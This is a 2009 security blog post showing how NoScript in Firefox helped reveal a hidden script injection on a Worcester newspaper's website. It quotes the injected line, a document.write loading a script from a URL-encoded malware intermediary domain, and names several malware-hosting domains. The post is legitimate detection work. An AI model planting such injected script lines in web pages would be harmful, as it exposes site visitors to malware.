Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
Loading site search ...

NoScript Helps Reveal Website Exploits – Telegram .com Case

   13 May 09   Filed in Tips and Tricks

FireFox + NoScript

Screenshot: NoScript

I usually suggest that you should use FireFox with the NoScript plugin for safer web browsing. This combo will save you from most web threats. Just remember one rule: Never use the “Allow this page” and the “Allow Scripts Globally” options.

NoScript reveals website exploits

NoScript is also a great helper in revealing tricky website exploits.

Let me use the “Telegram .com” case to show how I use it.

Telegram .com is a website of a Worcester, Ma newspaper. Google currently lists this site as suspicious and many browsers (FireFox3, Safary, Google Chrome) display a warning when you visit this site.

Google’s Safe-Browsing diagnostic page says:

Malicious software is hosted on 3 domain(s), including baidubadu .com/, tibetanpic .com/, dsaff .com/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including xxyou .net/.

I usually start my investigations with Unmask Parasites. It is the fastest and safest way to detect many types of website security issues. However this time the report only stated that Google listed this site as suspicious.

The next step was to load the site in Firefox (on a Linux machine to minimize security risks) and check the NoScript menu (it displays external domains that require JavaScript). There were quite a few domains in the menu, but none of then resembled the sites mentioned on the Google’s diagnostic page.

It was time to enable telegram .com in the NoScript menu. I clicked the “Temporarily allow telegram .com“. When the page reloaded I right-clicked on the NoScript icon and found a new suspicious entry in
the menu: “Allow http: //%78%78%79%6F%75%2E%6E%65%74

Screenshot: - NoScript menu with the xxyou .net item

I decoded this URL: %78%78%79%6F%75%2E%6E%65%74 = xxyou .net

Bingo! This is the site mentioned as an intermediary on the Google’s diagnostic page.

The fact this domain appeared only after enabling scripts on telegram .com mean that the “xxyou .net” reference was hidden somewhere in .js files on telegram .com web server.

I downloaded (using wget) the .js files. No wonder, at the very bottom of the “/assets/AC_RunActiveContent.js” file I discovered the following code:

document.write('<script src=http: //%78%78%79%6F%75%2E%6E%65%74 /msn.gif></script>');

Hope, despite of this hack, Telegram .com has decent webmasters and sysadmins, and they’ll figure out how their site was infected and will prevent any recurrence. This article is about detection only. (Update: After posting this article, I checked the site again and the malicious script was gone. )

As you can see, NoScript helped reveal the exploit. At the same time it preserved me from a threat even after enabling JavaScript on telegram .com, since the rest external scripts were still disabled.

Want to share your tricks?

If you know any other NoScript tricks, please share them in the comments section below. If you have any other security related tips and tricks, and want to share them with readers of my blog, you can contact me and offer a guest post.

Similar posts:

Comments are closed.